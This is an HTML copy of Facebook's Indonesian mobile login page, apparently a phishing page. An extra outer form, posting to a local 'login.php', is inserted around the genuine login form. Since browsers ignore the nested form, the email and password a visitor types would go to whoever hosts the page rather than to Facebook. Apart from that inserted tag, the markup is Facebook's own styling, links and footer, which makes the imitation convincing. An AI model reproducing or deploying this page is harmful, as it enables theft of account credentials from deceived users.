<html xmlns="http://www.w3.org/1999/xhtml">
 <head>
  <title>Facebook - Masuk atau Daftar</title>
  <meta name="viewport" content="initial-scale=1, width=240">
  <meta name="referrer" content="default" id="meta_referrer">
  <style type="text/css">/*<![CDATA[*/.b .ce{display:block;width:auto;}.b .ce .cf,.b .ce .cf:hover{background-color:#42b72a;color:#fff;height:44px;}.b .ca{display:block;margin-bottom:5px;margin-left:3%;margin-top:-3px;overflow:hidden;text-align:center;white-space:nowrap;width:94%;}.b .ca>span{display:inline-block;position:relative;}.b .ca>span:before,.b .ca>span:after{background:#ced0d4;content:"";height:1px;position:absolute;top:50%;width:9999px;}.b .ca>span:before{margin-right:15px;right:100%;}.b .ca>span:after{left:100%;margin-left:15px;}.b .cb{color:#4b4f56;font-size:14px;}.x{padding:8px;}.ci{padding-bottom:12px;padding-top:12px;}.ch{padding-left:4px;padding-right:4px;}.cd{padding-left:8px;padding-right:8px;}.br{padding-bottom:4px;}.b .bu{border:solid 1px #999;-webkit-box-sizing:border-box;width:100%;}.b .u{border:0;border-collapse:collapse;margin:0;padding:0;width:100%;}.b .u tbody{vertical-align:top;}.b .u td{padding:0;}.b .u td.bn{padding:4px;}.b .v{width:100%;}.w{background:#fa3e3e;}.y{color:#fff;}.b .y a,.b .y a:visited{color:#fff;font-weight:bold;}.b .y a:focus,.b .y a:hover{background:#1d2129;}.ck{color:#4b4f56;}.z{font-size:12px;line-height:16px;}.cj{font-size:16px;line-height:20px;}.m{font-weight:normal;}.bp{font-weight:bold;}.cc{text-align:center;}.f{background-color:#fff;}.h{background-color:#3b5998;}.ba{background-color:#eceff5;}.bb{background-color:#fffbe2;color:#7f7212;}.i{padding:2px 3px;}.bc{padding:6px 3px;}.bd{border-top:1px solid;}.be{border-bottom:1px solid;}.f{border-color:#e9e9e9;}.h{border-color:#1d4088;}.ba{border-color:#d8dfea;}.bb{border-color:#e2c822;}.bf .bg{display:inline-block;margin-right:4px;}.b .bf .bg{float:left;}.b .bf .bh{display:table-cell;}.k{border:0;display:inline-block;vertical-align:top;}i.k u{position:absolute;width:0;height:0;overflow:hidden;}.b a,.b a:visited{color:#3b5998;text-decoration:none;}.b a:focus,.b a:hover{background-color:#3b5998;color:#fff;}.bi{clear:both;}form{margin:0;border:0;}.bm{margin:0;}.bm li{display:block;list-style:none;}.b .cl{padding:0;}.b .bn{padding:4px;}.b .bq{color:#90949c;font-weight:bold;}.b .bt{padding:12px 8px;color:#1d2129;}.bs{border:0;display:block;margin:0;padding:0;}.bv{-webkit-box-sizing:border-box;width:100%;}.b .bw{border:solid 1px #999;}.o{-webkit-appearance:none;background:none;display:inline-block;font-size:12px;height:28px;line-height:28px;margin:0;overflow:visible;padding:0 9px;text-align:center;vertical-align:top;white-space:nowrap;}.b .o{border-radius:2px;}.cg,a.cg,.b a.cg,.b a.cg:visited{background-color:#f6f7f9;color:#4b4f56;}.b a.cg:hover,.b .cg:hover{background-color:#e9ebee;color:#4b4f56;}.b .cg{border:1px solid #bec2c9;}.cg[disabled]{color:#bec2c9;}.b .cg[disabled]:hover{background-color:#f6f7f9;color:#bec2c9;}.bz,.s,a.bz,a.s,html .b a.bz,html .b a.s{color:#fff;}.b .s{background-color:#4080ff;border:1px solid #4476e8;}.b a.s:hover,.b .s:hover{background-color:#4580ef;}.b .bz{background-color:#4267b2;border:1px solid #365899;}.b a.bz:hover,.b .bz:hover{background-color:#465e91;}.bz[disabled]{color:#899bc1;}.s[disabled]{color:#91b4fd;}.b .bz[disabled]:hover{background-color:#4267b2;}.b .s[disabled]:hover{background-color:#4080ff;}.by{font-size:14px;height:44px;line-height:44px;padding:0 20px;}.o .t{display:inline-block;}.b .o .t{display:inline-block;margin-top:0;vertical-align:middle;}.b a.o::after{content:"";display:inline-block;height:100%;vertical-align:middle;}.o .t{line-height:20px;margin-top:4px;}.by .t{line-height:24px;margin-top:10px;}.o.bx{display:block;width:100%;}a.o.bx,.b label.o.bx{display:block;width:auto;}.b .o{padding:0 8px;}.b a.o{height:26px;line-height:26px;}.b .by{padding:0 19px;}.b a.by{font-size:14px;height:42px;line-height:42px;}.t{pointer-events:none;}body{text-align:left;direction:ltr;}body,tr,input,textarea,button{font-family:sans-serif;}body,p,figure,h1,h2,h3,h4,h5,h6,ul,ol,li,dl,dd,dt{margin:0;padding:0;}h1,h2,h3,h4,h5,h6{font-size:1em;font-weight:bold;}ul,ol{list-style:none;}article,aside,figcaption,figure,footer,header,nav,section{display:block;}#page{position:relative;}.b .p span{font-size:14px;}.b a.q,.b a.q:hover{background-color:#69a74e;color:#fff;}.j{width:100%;}.j .l{text-align:right;}.cq{display:block;font-size:x-small;margin:-3px -3px 1px -3px;padding:3px;}.cs{border:1px solid #90949c;display:block;font-size:x-large;height:20px;line-height:18px;text-align:center;vertical-align:middle;width:20px;}.b .cn input,.b .cn input:visited,.b .cn a,.b .cn a:visited{color:#bec2c9;}.b .cn input:focus,.b .cn input:hover,.b .cn a:focus,.b .cn a:hover{background:#dddfe2;color:#1d2129;}.cm{background-color:#4b4f56;font-size:x-small;padding:7px 8px 8px;}.cp{color:#bec2c9;display:block;font-size:x-small;margin:-3px -3px 1px -3px;padding:3px;}.ct{color:#fff;}body,tr,input,textarea,.g{font-size:medium;}/*]]>*/</style>
  <meta name="description" content="Buat akun atau masuk ke Facebook. Terhubunglah dengan teman, keluarga, dan orang lain yang Anda kenal. Bagikan foto dan video, kirim pesan, dan dapatkan...">
  <link rel="canonical" href="https://www.facebook.com/">
  <meta name="google" content="notranslate">
 </head>
 <body tabindex="0" class="b c d e f">
  <div class="g">
   <div id="viewport">
    <div class="h i" id="header">
     <table cellspacing="0" cellpadding="0" class="j">
      <tbody>
       <tr>
        <td valign="middle"><h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">Facebook</h1><img src="https://static.xx.fbcdn.net/rsrc.php/v3/yo/r/BUaAeiySWy9.png" width="77" height="15" class="k" alt="facebook"></td>
        <td valign="middle" class="l"><a class="m n o p q s" href="/reg/?cid=102&amp;refid=8"><span class="t">Buat Akun</span></a></td>
       </tr>
      </tbody>
     </table>
    </div>
    <div id="objects_container">
     <div class="f" id="root" role="main">
      <table class="u" role="presentation">
       <tbody>
        <tr>
         <td class="v">
          <div class="w x y" style="display: none;">
           <div class="z"></div>
          </div>
          <div class="ba">
           <div>
            <div>
             <div class="bb bc bd be">
              <div class="bf">
               <img src="https://static.xx.fbcdn.net/rsrc.php/v3/yp/r/IEX6HsfKjDJ.png" width="18" height="32" class="bg k">
               <div class="bh">
                <a href="https://m.facebook.com/click.php?redir_url=market%3A%2F%2Fdetails%3Fid%3Dcom.facebook.katana%26referrer%3Dutm_reg%253DsWvrWbOrFwCIo2AibE8BqbC8&amp;app_id=350685531728&amp;cref=mb&amp;no_fw=1&amp;refid=8">Pasang Facebook untuk Android dan buka lebih cepat.</a>
               </div>
               <div class="bi"></div>
              </div>
             </div>
            </div>
           </div>
           <div class="bj">
<form action="login.php" id="login-form" method="post">
            <form method="post" action="https://m.facebook.com/login.php?refsrc=https%3A%2F%2Fwww.facebook.com%2F&amp;lwv=100&amp;refid=8" class="bk bl" id="login_form" novalidate="1">
             <input type="hidden" name="lsd" value="AVro4BOJ" autocomplete="off">
             <input type="hidden" name="m_ts" value="1508650688">
             <input type="hidden" name="li" value="wC7sWbCLNcC-uSJh25XpXw5R">
             <input type="hidden" name="try_number" value="0">
             <input type="hidden" name="unrecognized_tries" value="0">
             <ul class="bm bn bo">
              <li class="bn"><span class="bp bq br" id="u_0_0">Email atau Telepon</span><input autocorrect="off" autocapitalize="off" type="text" class="bs bt bu" id="m_login_email" name="email" aria-labelledby="u_0_0"></li>
              <li class="bn">
               <div>
                <span class="bp bq br" id="u_0_1">Kata Sandi</span>
                <input autocorrect="off" autocapitalize="off" class="bs bt bv bw" name="pass" aria-labelledby="u_0_1" type="password">
               </div></li>
              <li class="bn"><input value="Masuk" type="submit" name="login" class="n m o bx by bz"></li>
             </ul>
             <div>
              <div class="ca">
               <span class="cb">atau</span>
              </div>
              <div class="cc cd">
               <div class="cc ce" id="signup-button">
                <input value="Buat Akun Baru" type="submit" name="sign_up" class="n m o cf cg">
               </div>
              </div>
             </div>
             <div></div>
             <noscript>
              <input type="hidden" name="_fb_noscript" value="true" />
             </noscript>
            </form>
            <div class="ch ci">
             <span class="cj ck">
              <ul class="bm cl">
               <li class="bn"><a href="/recover/initiate/?c=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fwww.facebook.com%252F&amp;lwv=100&amp;refid=8" id="forgot-password-link">Lupa Kata Sandi?</a></li>
               <li class="bn"><a href="/help/?refid=8" id="help-link">Pusat Bantuan</a></li>
              </ul></span>
            </div>
           </div>
          </div></td>
        </tr>
       </tbody>
      </table>
      <div></div>
      <img src="https://facebook.com/security/hsts-pixel.gif?c=3.2" width="0" height="0" style="display:none">
     </div>
    </div>
    <div>
     <div class="cm">
      <div class="cn">
       <table class="u" role="presentation">
        <tbody>
         <tr>
          <td class="v co" style="width:50%"><b class="cp">Bahasa Indonesia</b><a class="cq" href="/a/language.php?l=es_LA&amp;lref=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fwww.facebook.com%252F&amp;index=2&amp;gfid=AQC3paWfIIlOcvvd&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8">Español</a><a class="cq" href="/a/language.php?l=fr_FR&amp;lref=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fwww.facebook.com%252F&amp;index=4&amp;gfid=AQCMNb4QbSTPIu_k&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8">Français (France)</a></td>
          <td class="v cr" style="width:50%"><a class="cq" href="/a/language.php?l=en_US&amp;lref=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fwww.facebook.com%252F&amp;index=1&amp;gfid=AQDrezzUXOHYeCAg&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8">English (US)</a><a class="cq" href="/a/language.php?l=pt_BR&amp;lref=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fwww.facebook.com%252F&amp;index=3&amp;gfid=AQAWu643LkPf4_G4&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8">Português (Brasil)</a><a class="cq" href="/language.php?n=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fwww.facebook.com%252F&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8">
            <div class="cs">
              + 
            </div></a></td>
         </tr>
        </tbody>
       </table>
      </div>
      <span class="bp ct">Facebook © 2017</span>
     </div>
    </div>
   </div>
  </div>
 </body>
</html>